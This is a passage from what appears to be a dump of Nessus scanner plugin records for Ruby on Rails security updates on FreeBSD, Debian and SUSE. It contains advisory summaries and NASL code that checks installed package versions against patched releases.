PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136726);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/26\");\n\n script_cve_id(\"CVE-2020-8162\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8166\", \"CVE-2020-8167\");\n\n script_name(english:\"FreeBSD : Rails -- multiple vulnerabilities (85fca718-99f6-11ea-bf1d-08002728f74c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Ruby on Rails blog :\n\nHi everyone! Rails 5.2.4.3 and 6.0.3.1 have been released! These\nreleases contain important security fixes, so please upgrade when you\ncan.\n\nBoth releases contain the following fixes :\n\nCVE-2020-8162: Circumvention of file size limits in ActiveStorage\n\nCVE-2020-8164: Possible Strong Parameters Bypass in ActionPack\n\nCVE-2020-8165: Potentially unintended unmarshalling of user-provided\nobjects in MemCacheStore and RedisCacheStore\n\nCVE-2020-8166: Ability to forge per-form CSRF tokens given a global\nCSRF token\n\nCVE-2020-8167: CSRF Vulnerability in rails-ujs\"\n );\n # https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8268ac87\"\n );\n # https://groups.google.com/forum/#!topic/rubyonrails-security/PjU3946mreQ\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97c30406\"\n );\n # https://groups.google.com/forum/#!topic/rubyonrails-security/f6ioe4sdpbY\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc4f9c88\"\n );\n # https://groups.google.com/forum/#!topic/rubyonrails-security/bv6fW4S0Y1c\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bbe96cfa\"\n );\n # https://groups.google.com/forum/#!topic/rubyonrails-security/NOjKiGeXUgw\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?62b6f4ce\"\n );\n # https://groups.google.com/forum/#!topic/rubyonrails-security/x9DixQDG9a0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?59fb4e94\"\n );\n # https://vuxml.freebsd.org/freebsd/85fca718-99f6-11ea-bf1d-08002728f74c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6180b1f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8165\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activestorage52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activestorage60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activesupport52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activesupport60\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack52<5.2.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview52<5.2.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activestorage52<5.2.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activesupport52<5.2.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack60<6.0.3.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview60<6.0.3.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activestorage60<6.0.3.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activesupport60<6.0.3.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:39", "description": "Two vulnerabilities were found in Ruby on Rails, a MVC ruby-based framework geared for web application development, which could lead to remote code execution and untrusted user input usage, depending on the application.\n\nCVE-2020-8164\n\nStrong parameters bypass vector in ActionPack. In some cases user supplied information can be inadvertently leaked from Strong Parameters. Specifically the return value of `each`, or `each_value`, or `each_pair` will return the underlying 'untrusted' hash of data that was read from the parameters. Applications that use this return value may be inadvertently use untrusted user input.\n\nCVE-2020-8165\n\nPotentially unintended unmarshalling of user-provided objects in MemCacheStore. There is potentially unexpected behaviour in the MemCacheStore where, when untrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result from the cache can evaluate the user input as a Marshalled object instead of plain text. Unmarshalling of untrusted user input can have impact up to and including RCE. At a minimum, this vulnerability allows an attacker to inject untrusted Ruby objects into a web application.\n\nIn addition to upgrading to the latest versions of Rails, developers should ensure that whenever they are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both reading and writing.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2:4.1.8-1+deb8u7.\n\nWe recommend that you upgrade your rails packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-06-22T00:00:00", "type": "nessus", "title": "Debian DLA-2251-1 : rails security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8164", "CVE-2020-8165"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "p-cpe:/a:debian:debian_linux:ruby-actionmailer", "p-cpe:/a:debian:debian_linux:ruby-actionpack", "p-cpe:/a:debian:debian_linux:ruby-actionview", "p-cpe:/a:debian:debian_linux:ruby-activemodel", "p-cpe:/a:debian:debian_linux:ruby-activerecord", "p-cpe:/a:debian:debian_linux:ruby-activesupport", "p-cpe:/a:debian:debian_linux:ruby-activesupport-2.3", "p-cpe:/a:debian:debian_linux:ruby-rails", "p-cpe:/a:debian:debian_linux:ruby-railties", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-2251.NASL", "href": "https://www.tenable.com/plugins/nessus/137670", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2251-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137670);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2020-8164\", \"CVE-2020-8165\");\n\n script_name(english:\"Debian DLA-2251-1 : rails security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Two vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8164\n\nStrong parameters bypass vector in ActionPack. In some cases user\nsupplied information can be inadvertently leaked from Strong\nParameters. Specifically the return value of `each`, or `each_value`,\nor `each_pair` will return the underlying 'untrusted' hash of data\nthat was read from the parameters. Applications that use this return\nvalue may be inadvertently use untrusted user input.\n\nCVE-2020-8165\n\nPotentially unintended unmarshalling of user-provided objects in\nMemCacheStore. There is potentially unexpected behaviour in the\nMemCacheStore where, when untrusted user input is written to the cache\nstore using the `raw: true` parameter, re-reading the result from the\ncache can evaluate the user input as a Marshalled object instead of\nplain text. Unmarshalling of untrusted user input can have impact up\nto and including RCE. At a minimum, this vulnerability allows an\nattacker to inject untrusted Ruby objects into a web application.\n\nIn addition to upgrading to the latest versions of Rails,\ndevelopers should ensure that whenever they are calling\n`Rails.cache.fetch` they are using consistent values of the\n`raw` parameter for both reading and writing.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2:4.1.8-1+deb8u7.\n\nWe recommend that you upgrade your rails packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/rails\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8165\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionmailer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activesupport-2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"rails\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionpack\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionview\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activemodel\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activerecord\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport-2.3\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-rails\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-railties\", reference:\"2:4.1.8-1+deb8u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T17:16:40", "description": "The remote SUSE Linux SLES15 / openSUSE 15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2023:2059-1 advisory.\n\n - In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory. (CVE-2020-15169)\n\n - A CSRF vulnerability exists in rails <= 6.0.3 rails-ujs module that could allow attackers to send CSRF tokens to wrong domains. (CVE-2020-8167)\n\n - A XSS Vulnerability in Action View tag helpers >= 5.2.0 and < 5.2.0 which would allow an attacker to inject content if able to control input into specific attributes. (CVE-2022-27777)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-28T00:00:00", "type": "nessus", "title": "SUSE SLES15 / openSUSE 15 Security Update : rubygem-actionview-5_1 (SUSE-SU-2023:2059-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15169", "CVE-2020-8167", "CVE-2022-27777"], "modified": "2023-07-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ruby2.5-rubygem-actionview-5_1", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2023-2059-1.NASL", "href": "https://www.tenable.com/plugins/nessus/174923", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2023:2059-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174923);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/14\");\n\n script_cve_id(\"CVE-2020-8167\", \"CVE-2020-15169\", \"CVE-2022-27777\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2023:2059-1\");\n\n script_name(english:\"SUSE SLES15 / openSUSE 15 Security Update : rubygem-actionview-5_1 (SUSE-SU-2023:2059-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES15 / openSUSE 15 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2023:2059-1 advisory.\n\n - In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS)\n vulnerability in Action View's translation helpers. Views that allow the user to control the default (not\n found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe\n string is passed as the default for a missing translation key named html or ending in _html, the default\n string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and\n 5.2.4.4. A workaround without upgrading is proposed in the source advisory. (CVE-2020-15169)\n\n - A CSRF vulnerability exists in rails <= 6.0.3 rails-ujs module that could allow attackers to send CSRF\n tokens to wrong domains. (CVE-2020-8167)\n\n - A XSS Vulnerability in Action View tag helpers >= 5.2.0 and < 5.2.0 which would allow an attacker to\n inject content if able to control input into specific attributes. (CVE-2022-27777)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1172184\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1176421\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1199060\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-15169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-8167\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-27777\");\n # https://lists.suse.com/pipermail/sle-security-updates/2023-April/014619.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f2da331\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby2.5-rubygem-actionview-5_1 and / or ruby2.5-rubygem-actionview-doc-5_1 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-27777\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-8167\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.5-rubygem-actionview-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES|SUSE)\") audit(AUDIT_OS_NOT, \"SUSE / openSUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+|SUSE([\\d.]+))\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE / openSUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15|SUSE15\\.4)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES15 / openSUSE 15', 'SUSE / openSUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE / openSUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1|2|3|4)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES15 SP1/2/3/4\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'ruby2.5-rubygem-actionview-5_1-5.1.4-150000.3.6.1', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['openSUSE-release-15.4']},\n {'reference':'ruby2.5-rubygem-actionview-doc-5_1-5.1.4-150000.3.6.1', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['openSUSE-release-15.4']},\n {'reference':'ruby2.5-rubygem-actionview-5_1-5.1.4-150000.3.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-ha-release-15.1']},\n {'reference':'ruby2.5-rubygem-actionview-5_1-5.1.4-150000.3.6.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-ha-release-15.2']},\n {'reference':'ruby2.5-rubygem-actionview-5_1-5.1.4-150000.3.6.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-ha-release-15.3']},\n {'reference':'ruby2.5-rubygem-actionview-5_1-5.1.4-150000.3.6.1', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-ha-release-15.4']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ruby2.5-rubygem-actionview-5_1 / ruby2.5-rubygem-actionview-doc-5_1');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:05:09", "description": "Multiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based framework geared for web application development, which could lead to remote code execution and untrusted user input usage, depending on the application.\n\nCVE-2020-8163\n\nA code injection vulnerability in Rails would allow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.\n\nCVE-2020-8164\n\nA deserialization of untrusted data vulnerability exists in rails which can allow an attacker to supply information can be inadvertently leaked from Strong Parameters.\n\nCVE-2020-8165\n\nA deserialization of untrusted data vulnernerability exists in rails that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.\n\nFor Debian 9 stretch, these problems have been fixed in version 2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to its security tracker page at: https://security-tracker.debian.org/tracker/rails\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-21T00:00:00", "type": "nessus", "title": "Debian DLA-2282-1 : rails security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8163", "CVE-2020-8164", "CVE-2020-8165"], "modified": "2020-08-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "p-cpe:/a:debian:debian_linux:ruby-actionmailer", "p-cpe:/a:debian:debian_linux:ruby-actionpack", "p-cpe:/a:debian:debian_linux:ruby-actionview", "p-cpe:/a:debian:debian_linux:ruby-activejob", "p-cpe:/a:debian:debian_linux:ruby-activemodel", "p-cpe:/a:debian:debian_linux:ruby-activerecord", "p-cpe:/a:debian:debian_linux:ruby-activesupport", "p-cpe:/a:debian:debian_linux:ruby-rails", "p-cpe:/a:debian:debian_linux:ruby-railties", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2282.NASL", "href": "https://www.tenable.com/plugins/nessus/138781", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2282-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138781);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2020-8163\", \"CVE-2020-8164\", \"CVE-2020-8165\");\n\n script_name(english:\"Debian DLA-2282-1 : rails security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on 